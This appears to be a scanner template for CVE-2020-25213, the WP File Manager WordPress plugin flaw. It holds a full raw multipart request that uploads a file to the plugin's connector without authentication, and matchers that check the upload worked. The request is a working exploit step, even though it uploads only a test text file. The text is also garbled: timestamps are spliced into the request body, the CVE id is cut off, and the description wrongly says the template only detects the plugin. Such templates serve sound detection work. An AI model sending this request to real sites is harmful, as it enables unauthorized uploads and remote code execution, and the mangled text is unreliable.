2021-02-11 19:18:25 +00:00
id : CVE-2020–
info :
name : WP File Manager RCE
author : foulenzer
severity : critical
description : The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference : https://nvd.nist.gov/vuln/detail/CVE-2020-25213
tags : cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
requests :
- raw :
- |
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Length : 608
Content-Type : multipart/form-data; boundary=------------------------ca81ac1fececda48
Connection : close
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="reqid"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
17457a1fe6959
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="cmd"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
upload
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="target"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
l1_Lw
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="mtime[]"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
1576045135
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="upload[]"; filename="poc.txt"
Content-Type : text/plain
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
poc-test
--------------------------ca81ac1fececda48--
matchers-condition : and
matchers :
- type : word
words :
- poc.txt
- added
condition : and
- type : word
words :
- application/json
part : header
- type : status
status :
- 200
